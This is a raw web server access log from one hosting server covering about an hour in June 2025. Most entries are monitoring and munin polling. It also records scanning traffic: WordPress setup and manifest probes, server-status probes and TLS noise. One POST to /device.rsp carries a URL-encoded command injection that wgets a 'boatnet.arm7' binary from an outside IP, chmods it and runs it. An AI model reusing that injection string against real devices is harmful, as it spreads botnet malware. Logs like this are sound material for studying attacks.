198.177.126.50 - - [15/Jun/2025:18:16:17 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:17:02 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:17:42 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:19:08 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:19:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:20:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41061 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:20:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:20:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:20:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:20:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:20:34 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [15/Jun/2025:18:20:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:21:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:22:53 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:23:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:24:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:25:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41145 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:25:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:25:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:25:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:25:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:18:25:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:25:52 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
147.185.132.174 - - [15/Jun/2025:18:26:06 +0000] "GET / HTTP/1.0" 200 163 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.54.118.134 - - [15/Jun/2025:18:26:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:26:41 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [15/Jun/2025:18:27:14 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:18:27:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:27:58 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:18:28:28 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [15/Jun/2025:18:28:45 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:29:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:30:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41868 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:30:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:30:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:30:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:30:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [15/Jun/2025:18:30:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:31:41 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:32:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:33:33 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:18:33:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
144.172.116.95 - - [15/Jun/2025:18:34:34 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 10499 "-" "Mozilla/5.0"
209.74.73.66 - - [15/Jun/2025:18:34:36 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:35:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40934 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:35:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:35:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:35:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:35:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [15/Jun/2025:18:35:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:36:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
185.218.84.178 - - [15/Jun/2025:18:37:13 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
209.74.73.66 - - [15/Jun/2025:18:37:32 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
43.159.36.244 - - [15/Jun/2025:18:38:25 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.118.134 - - [15/Jun/2025:18:38:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:38:50 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:18:39:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:40:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40912 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:40:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:40:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:40:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:40:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:18:40:28 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:41:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
204.76.203.212 - - [15/Jun/2025:18:41:37 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.177.126.50 - - [15/Jun/2025:18:42:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:43:23 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
156.146.35.169 - - [15/Jun/2025:18:43:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:26 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 10102 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:27 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 404 10076 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:27 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:27 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:27 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:28 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10122 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:28 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:28 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10108 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:28 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:28 +0000] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:29 +0000] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:29 +0000] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:29 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:30 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:30 +0000] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:30 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:30 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:31 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.146.35.169 - - [15/Jun/2025:18:43:31 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:18:44:33 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:18:44:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:45:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41264 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:45:01 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:45:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:45:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:45:05 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:45:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [15/Jun/2025:18:45:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:46:05 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [15/Jun/2025:18:46:19 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:46:31 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:18:46:41 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.38.97.101 - - [15/Jun/2025:18:47:23 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0"
209.38.97.101 - - [15/Jun/2025:18:47:23 +0000] "GET /favicon.ico HTTP/1.1" 404 10070 "http://bluveriq.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0"
209.38.97.101 - - [15/Jun/2025:18:47:23 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0"
209.38.97.101 - - [15/Jun/2025:18:47:24 +0000] "GET /favicon.ico HTTP/1.1" 404 10070 "https://bluveriq.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0"
198.54.118.134 - - [15/Jun/2025:18:47:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:48:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:49:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:50:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41329 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:50:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:50:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:50:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:50:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:50:14 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
193.24.123.69 - - [15/Jun/2025:18:50:14 +0000] "\x16\x03\x02\x01o\x01" 400 10073 "-" "-"
198.54.118.134 - - [15/Jun/2025:18:50:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
193.24.123.85 - - [15/Jun/2025:18:51:14 +0000] "GET /server-status HTTP/1.1" 404 10083 "-" "Go-http-client/1.1"
193.24.123.69 - - [15/Jun/2025:18:51:14 +0000] "\x16\x03\x01\x05\xa8\x01" 400 10073 "-" "-"
193.24.123.69 - - [15/Jun/2025:18:51:14 +0000] "GET / HTTP/1.1" 200 163 "-" "fasthttp"
193.24.123.69 - - [15/Jun/2025:18:51:14 +0000] "GET /aaa9 HTTP/1.1" 404 10065 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
193.24.123.69 - - [15/Jun/2025:18:51:15 +0000] "\x16\x03\x01\x05\xa8\x01" 400 10073 "-" "-"
193.24.123.69 - - [15/Jun/2025:18:51:15 +0000] "GET /aab9 HTTP/1.1" 404 10065 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
193.24.123.85 - - [15/Jun/2025:18:51:31 +0000] "\x16\x03\x01\x05\xa8\x01" 400 10073 "-" "-"
193.24.123.85 - - [15/Jun/2025:18:51:31 +0000] "GET /server-status HTTP/1.1" 404 10083 "-" "Go-http-client/1.1"
193.24.123.85 - - [15/Jun/2025:18:51:32 +0000] "GET /aaa9 HTTP/1.1" 404 10065 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
193.24.123.85 - - [15/Jun/2025:18:51:32 +0000] "\x16\x03\x01\x05\xa8\x01" 400 10073 "-" "-"
193.24.123.85 - - [15/Jun/2025:18:51:33 +0000] "GET /aab9 HTTP/1.1" 404 10065 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
198.177.126.50 - - [15/Jun/2025:18:51:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:52:10 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
5.183.209.244 - - [15/Jun/2025:18:52:17 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.54.118.134 - - [15/Jun/2025:18:53:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:54:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:55:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41202 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:55:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:55:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:55:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:55:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:18:55:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:55:35 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
152.32.135.132 - - [15/Jun/2025:18:55:51 +0000] "GET / HTTP/1.1" 200 163 "https://monima.firmakids.de.lahkotnost.si" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.37.95 - - [15/Jun/2025:18:55:52 +0000] "GET / HTTP/1.1" 200 163 "http://104.168.254.92:2095" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
152.32.135.132 - - [15/Jun/2025:18:55:52 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 200 6964 "https://monima.firmakids.de.lahkotnost.si" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.37.95 - - [15/Jun/2025:18:55:53 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 200 6964 "https://83.44.200.217:8443" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
152.32.135.132 - - [15/Jun/2025:18:55:54 +0000] "GET /cgi-sys/favicon.ico HTTP/1.1" 404 10119 "http://server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.37.95 - - [15/Jun/2025:18:55:54 +0000] "GET /cgi-sys/favicon.ico HTTP/1.1" 404 10121 "https://server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
152.32.135.132 - - [15/Jun/2025:18:55:55 +0000] "GET /favicon.ico HTTP/1.1" 404 10103 "http://server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.37.95 - - [15/Jun/2025:18:55:56 +0000] "GET /favicon.ico HTTP/1.1" 404 10105 "https://server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:18:56:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:57:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:58:02 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:59:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:19:00:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41122 "-" "-"
127.0.0.1 - - [15/Jun/2025:19:00:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:19:00:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:19:00:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:19:00:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:19:00:38 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:19:00:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:19:00:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:19:02:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:19:03:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:19:03:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:19:05:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41779 "-" "-"
